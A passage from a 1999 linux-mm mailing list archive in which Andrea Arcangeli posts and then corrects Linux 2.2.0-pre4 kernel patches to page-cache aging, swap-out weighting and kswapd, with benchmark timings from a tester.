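survives; a page that is never touched again goes on the second pass.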

I also added/removed some PG_referenced handling. But please don't trust
the PG_referenced changes too much, since I have not thought about them
very carefully (maybe they are not needed?). 

I went back to setting the minimum for cache and buffers to 5%. This lets
me run every memory-thrashing program I can for as long as I like and
still have my last command run (free) and filesystem data (ls -l) in
cache (because the thrashing program _only_ plays with its own VM and of
course asks nothing of the kernel). 

Ah, and whoops: in the last patch I made a mistake and forgot to change
max_cnt to unsigned long. This should also be changed in your tree, Linus. 

This new patch really seems to rock here and seems _far_ better than
anything I tried before! Steve, could you try it and send feedback?
Thanks ;) 

Please excuse me, Linus, for not having cleaned things up yet, but my
spare time is very limited and I would like to _try_ to improve things a
bit more first...

This patch is against 2.2.0-pre4 (the latest patch posted by Linus here).

Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.11
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Sat Jan  2 21:40:13 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/include/linux/pagemap.h
diff -u linux/include/linux/pagemap.h:1.1.1.1 linux/include/linux/pagemap.h:1.1.1.1.2.1
--- linux/include/linux/pagemap.h:1.1.1.1	Fri Nov 20 00:01:16 1998
+++ linux/include/linux/pagemap.h	Sat Jan  2 21:40:13 1999
@@ -77,6 +77,7 @@
 		*page->pprev_hash = page->next_hash;
 		page->pprev_hash = NULL;
 	}
+	clear_bit(PG_referenced, &page->flags);
 	page_cache_size--;
 }
 
Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.8 linux/mm/filemap.c:1.1.1.1.2.35
--- linux/mm/filemap.c:1.1.1.8	Fri Jan  1 19:12:53 1999
+++ linux/mm/filemap.c	Sat Jan  2 21:40:13 1999
@@ -118,6 +122,10 @@
 	__free_page(page);
 }
 
+#define HANDLE_AGING(page)					\
+	if (test_and_clear_bit(PG_referenced, &(page)->flags))	\
+		continue;
+
 int shrink_mmap(int priority, int gfp_mask)
 {
 	static unsigned long clock = 0;
@@ -140,12 +148,11 @@
 			page = page->next_hash;
 			clock = page->map_nr;
 		}
-		
-		if (test_and_clear_bit(PG_referenced, &page->flags))
-			continue;
 
 		/* Decrement count only for non-referenced pages */
-		count--;
+		if (!test_bit(PG_referenced, &page->flags))
+			count--;
+
 		if (PageLocked(page))
 			continue;
 
@@ -160,6 +167,7 @@
 		if (page->buffers) {
 			if (buffer_under_min())
 				continue;
+			HANDLE_AGING(page);
 			if (!try_to_free_buffers(page))
 				continue;
 			return 1;
@@ -167,12 +175,14 @@
 
 		/* is it a swap-cache or page-cache page? */
 		if (page->inode) {
-			if (pgcache_under_min())
-				continue;
 			if (PageSwapCache(page)) {
+				HANDLE_AGING(page);
 				delete_from_swap_cache(page);
 				return 1;
 			}
+			if (pgcache_under_min())
+				continue;
+			HANDLE_AGING(page);
 			remove_inode_page(page);
 			return 1;
 		}
@@ -181,6 +191,8 @@
 	return 0;
 }
 
+#undef HANDLE_AGING
+
 /*
  * Update a page cache copy, when we're doing a "write()" system call
  * See also "update_vm_cache()".
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.57
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sat Jan  2 21:45:22 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -162,8 +168,9 @@
 			 * copy in memory, so we add it to the swap
 			 * cache. */
 			if (PageSwapCache(page_map)) {
+				entry = atomic_read(&page_map->count);
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return entry;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -180,8 +187,9 @@
 		 * asynchronously.  That's no problem, shrink_mmap() can
 		 * correctly clean up the occassional unshared page
 		 * which gets left behind in the swap cache. */
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return 1;	/* we slept: the process may not exist any more */
+		return entry;	/* we slept: the process may not exist any more */
 	}
 
 	/* The page was _not_ dirty, but still has a zero age.  It must
@@ -194,8 +202,9 @@
 		set_pte(page_table, __pte(entry));
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
+		entry = atomic_read(&page_map->count);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return entry;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,7 +219,7 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
+	entry = atomic_read(&page_map->count);
 	__free_page(page_map);
 	return entry;
 }
@@ -230,7 +239,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -256,13 +265,19 @@
 		if (result)
 			return result;
 		address += PAGE_SIZE;
+		if (!*counter)
+		{
+			*next_addr = address;
+			return 0;
+		} else
+			(*counter)--;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +297,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter, next_addr);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +309,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter, unsigned long * next_addr)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +323,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter, next_addr);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +354,16 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			unsigned long next_addr;
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter, &next_addr);
 			if (result)
 				return result;
+			if (!*counter)
+			{
+				p->swap_address = next_addr;
+				return 0;
+			}
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +377,19 @@
 	return 0;
 }
 
+static unsigned long total_rss(void)
+{
+	unsigned long total_rss = 0;
+	struct task_struct * p;
+
+	read_lock(&tasklist_lock);
+	for (p = init_task.next_task; p != &init_task; p = p->next_task)
+		total_rss += p->mm->rss;
+	read_unlock(&tasklist_lock);
+
+	return total_rss;
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +398,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long max_cnt, counter;
+
+	counter = total_rss() >> priority;
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,13 +417,8 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter > 0) {
+		int retval;
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
@@ -413,8 +451,9 @@
 		 * Nonzero means we cleared out something, but only "1" means
 		 * that we actually free'd up a page as a result.
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
-			return 1;
+		retval = swap_out_process(pbest, gfp_mask, &counter);
+		if (retval)
+			return retval;
 	}
 out:
 	return 0;
@@ -441,42 +480,63 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	if (swap_out(priority, gfp_mask))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		default:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
+
+static int kswapd_free_pages(int kswapd_state)
+{
 	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+	unsigned long end_time = jiffies + (HZ-1)/100;
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+	do {
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
 	} while (time_before_eq(jiffies,end_time));
+	/* take kswapd_state on the stack to save some byte of memory */
 	return kswapd_state;
 }
 
+static inline void enable_swap_tick(void)
+{
+	timer_table[SWAP_TIMER].expires = jiffies+(HZ+99)/100;
+	timer_active |= 1<<SWAP_TIMER;
+}
+
 /*
  * The background pageout daemon.
  * Started as a kernel thread from the init process.
@@ -524,6 +584,7 @@
 		current->state = TASK_INTERRUPTIBLE;
 		flush_signals(current);
 		run_task_queue(&tq_disk);
+		enable_swap_tick();
 		schedule();
 		swapstats.wakeups++;
 		state = kswapd_free_pages(state);
@@ -543,35 +604,23 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
@@ -594,7 +643,8 @@
 	if (priority) {
 		p->counter = p->priority << priority;
 		wake_up_process(p);
-	}
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -632,9 +682,8 @@
 			want_wakeup = 3;
 	
 		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
+	} else
+		enable_swap_tick();
 }
 
 /* 
@@ -643,7 +692,6 @@
 
 void init_swap_timer(void)
 {
-	timer_table[SWAP_TIMER].expires = jiffies;
 	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	enable_swap_tick();
 }
Index: linux/fs/buffer.c
diff -u linux/fs/buffer.c:1.1.1.5 linux/fs/buffer.c:1.1.1.1.2.6
--- linux/fs/buffer.c:1.1.1.5	Fri Jan  1 19:10:20 1999
+++ linux/fs/buffer.c	Sat Jan  2 21:40:07 1999
@@ -1263,6 +1263,7 @@
 		panic("brw_page: page not locked for I/O");
 	clear_bit(PG_uptodate, &page->flags);
 	clear_bit(PG_error, &page->flags);
+	set_bit(PG_referenced, &page->flags);
 	/*
 	 * Allocate async buffer heads pointing to this page, just for I/O.
 	 * They do _not_ show up in the buffer hash table!


Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 31%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-02 20:52 31%               ` Andrea Arcangeli
@ 1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
  1999-01-05 13:33 62%                   ` [patch] new-vm improvement [Re: 2.2.0 Bug summary] Ben McCann
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-03  2:59 UTC (permalink / raw)
  To: Steve Bergman
  Cc: Linus Torvalds, Benjamin Redelings I, Stephen C. Tweedie,
	linux-kernel, Alan Cox, Rik van Riel, linux-mm

On Sat, 2 Jan 1999, Andrea Arcangeli wrote:

> is the swapout smart weight code. Basing the priority on the number of
> process to try to swapout was really ugly and not smart. 

But I made two mistakes in it. Benjamin pointed out after one msec that
there was no need to put the address on the stack, and looking a
_bit_ more at swap_out_pmd() I noticed that the old code was already
updating swap_address, whoops ;).
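
As a rough illustration of the swap_address point, here is a minimal
userspace sketch of a budgeted page walk that stores its resume point in
the task after every page, so no separate next_addr has to travel up the
call chain. toy_task, toy_scan(), TOY_PAGE_SIZE and the victim parameter
are made up for the example; only the ordering of the statements follows
swap_out_pmd() in the diff further down.

```c
#define TOY_PAGE_SIZE 4096UL

/* Hypothetical stand-in for the one task field the walk needs. */
struct toy_task {
	unsigned long swap_address;	/* where the next scan resumes */
};

/*
 * Walk [address, end) one page at a time.
 * Returns 1 when the page at "victim" is reached (a stand-in for
 * try_to_swap_out() succeeding), 0 when the range or the budget in
 * *counter runs out.  The caller must pass *counter > 0.
 */
static int toy_scan(struct toy_task *tsk, unsigned long address,
		    unsigned long end, unsigned long victim,
		    unsigned long *counter)
{
	do {
		int result = (address == victim);

		address += TOY_PAGE_SIZE;
		tsk->swap_address = address;	/* resume point is always current */
		if (result)
			return result;
		if (!--*counter)
			return 0;		/* scan budget used up */
	} while (address < end);
	return 0;
}
```

A second call that starts from tsk->swap_address simply continues where
the first one ran out of budget.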

I noticed the second, much more important mistake when running with
8Mbyte, because the memory-thrashing proggy was segfaulting. The bug was
to base the maximal weight of swap_out() on total_rss and not on the sum
of the total_vm of all processes. With 8Mbyte all my processes got
swapped out and so swap_out() stopped working ;). It's fixed now...
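
One possible reading of that failure, as a small userspace sketch: a scan
budget derived from resident pages collapses to zero once nothing is
resident, while a budget derived from mapped pages does not. struct
toy_mm and both helper names are hypothetical; the ">> priority" scaling
is the one used in the diff below.

```c
#include <stddef.h>

/* Hypothetical stand-in for the two per-process counters involved. */
struct toy_mm {
	unsigned long rss;	/* pages currently resident */
	unsigned long total_vm;	/* pages mapped, resident or not */
};

/* Budget from resident pages: 0 when every process is swapped out. */
static unsigned long weight_from_rss(const struct toy_mm *mm, size_t n,
				     unsigned int priority)
{
	unsigned long sum = 0;
	size_t i;

	for (i = 0; i < n; i++)
		sum += mm[i].rss;
	return sum >> priority;
}

/* Budget from mapped pages: independent of what is resident right now. */
static unsigned long weight_from_total_vm(const struct toy_mm *mm, size_t n,
					  unsigned int priority)
{
	unsigned long sum = 0;
	size_t i;

	for (i = 0; i < n; i++)
		sum += mm[i].total_vm;
	return sum >> priority;
}
```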

> The second change is done over shrink_mmap(), this will cause
> shrink_mmap() to care very more about aging. We have only one bit and we
> must use it carefully to get not out of cache ;) 

This change was pretty buggy too. The only good part was not checking
the pgcache min limit before shrinking the _swap_cache_. Now I have also
changed pgcache_under_min() to ignore the swap cache size (the swap
cache is now a bit more fast-varying/crazy).
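
To make the pgcache_under_min() change concrete, here is a sketch of the
old and new predicates as plain functions. The function and parameter
names are invented for the example; the arithmetic mirrors the two
versions of the macro in the mm.h hunk below, with swap_cache_pages
playing the role of swapper_inode.i_nrpages. It assumes the swap cache
is never larger than the page cache that contains it.

```c
/* Old check: swap cache pages count towards the page cache minimum. */
static int pgcache_under_min_old(unsigned long page_cache_pages,
				 unsigned long min_percent,
				 unsigned long num_physpages)
{
	return page_cache_pages * 100 < min_percent * num_physpages;
}

/* New check: only non-swap-cache pages count towards the minimum. */
static int pgcache_under_min_new(unsigned long page_cache_pages,
				 unsigned long swap_cache_pages,
				 unsigned long min_percent,
				 unsigned long num_physpages)
{
	return (page_cache_pages - swap_cache_pages) * 100 <
	       min_percent * num_physpages;
}
```

With 2048 physical pages and a 5 percent minimum, a 200-page cache of
which 150 pages are swap cache is above the minimum under the old check
but below it under the new one.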

> I also added/removed some PG_referenced. But please, don't trust too much
> the pg_refernced changes since I have not thought about it too much (maybe
> they are not needed?). 

Hmm, I guess at least the brw_page() set_bit was not needed, because
before that function runs either a __find_page() or an add_to_...cache()
has already been run.

> Ah and woops, in the last patch I do a mistake and I forget to change
> max_cnt to unsigned long. This should be changed also in your tree, Linus. 

Also, some counts should be changed from int to unsigned long to handle
huge RAM sizes.

> This new patch seems to really rocks here and seems _far_ better than
> anything I tried before! Steve, could try it and feedback? Thanks ;) 

Here is Steve's feedback:

                      128MB       8MB
                      -------     -------
Your previous patch:  132 sec     218 sec
This patch         :  118 sec     226 sec       

Even though `This patch' was pretty buggy (as pointed out above), it was
slightly _faster_ at 128MB. I guess the reason for the 8Mbyte slowdown
was the s/rss/total_vm/ thing (but I am not 100% sure).

I fixed the bugs, so I am reposting the fixed diff against pre4. I also
cleaned up a few things...

Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.12
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Sun Jan  3 03:43:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
@@ -379,8 +377,8 @@
 
 #define buffer_under_min()	((buffermem >> PAGE_SHIFT) * 100 < \
 				buffer_mem.min_percent * num_physpages)
-#define pgcache_under_min()	(page_cache_size * 100 < \
-				page_cache.min_percent * num_physpages)
+#define pgcache_under_min()	((page_cache_size-swapper_inode.i_nrpages)*100\
+				< page_cache.min_percent * num_physpages)
 
 #endif /* __KERNEL__ */
 
Index: linux/include/linux/pagemap.h
diff -u linux/include/linux/pagemap.h:1.1.1.1 linux/include/linux/pagemap.h:1.1.1.1.2.1
--- linux/include/linux/pagemap.h:1.1.1.1	Fri Nov 20 00:01:16 1998
+++ linux/include/linux/pagemap.h	Sat Jan  2 21:40:13 1999
@@ -77,6 +77,7 @@
 		*page->pprev_hash = page->next_hash;
 		page->pprev_hash = NULL;
 	}
+	clear_bit(PG_referenced, &page->flags);
 	page_cache_size--;
 }
 
Index: linux/mm/filemap.c
diff -u linux/mm/filemap.c:1.1.1.8 linux/mm/filemap.c:1.1.1.1.2.36
--- linux/mm/filemap.c:1.1.1.8	Fri Jan  1 19:12:53 1999
+++ linux/mm/filemap.c	Sun Jan  3 03:13:09 1999
@@ -122,13 +126,14 @@
 {
 	static unsigned long clock = 0;
 	unsigned long limit = num_physpages;
+	unsigned long count;
 	struct page * page;
-	int count;
 
 	count = limit >> priority;
 
 	page = mem_map + clock;
-	do {
+	while (count != 0)
+	{
 		page++;
 		clock++;
 		if (clock >= max_mapnr) {
@@ -167,17 +172,17 @@
 
 		/* is it a swap-cache or page-cache page? */
 		if (page->inode) {
-			if (pgcache_under_min())
-				continue;
 			if (PageSwapCache(page)) {
 				delete_from_swap_cache(page);
 				return 1;
 			}
+			if (pgcache_under_min())
+				continue;
 			remove_inode_page(page);
 			return 1;
 		}
 
-	} while (count > 0);
+	}
 	return 0;
 }
 
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.59
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Sun Jan  3 03:43:54 1999
@@ -10,6 +10,12 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Revisioned the page freeing algorithm (do_free_user_and_cache), and
+ * developed a smart mechanism to handle the swapout weight.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -163,7 +169,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +201,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +216,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +235,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +256,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +289,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +301,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +315,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +346,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +365,19 @@
 	return 0;
 }
 
+static unsigned long get_total_vm(void)
+{
+	unsigned long total_vm = 0;
+	struct task_struct * p;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+		total_vm += p->mm->total_vm;
+	read_unlock(&tasklist_lock);
+
+	return total_vm;
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,8 +386,11 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
 
+	counter = get_total_vm() >> priority;
+
 	/* 
 	 * We make one or two passes through the task list, indexed by 
 	 * assign = {0, 1}:
@@ -374,20 +405,14 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter > 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
 	 		if (p->mm->rss <= 0)
@@ -410,10 +435,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -441,42 +467,63 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
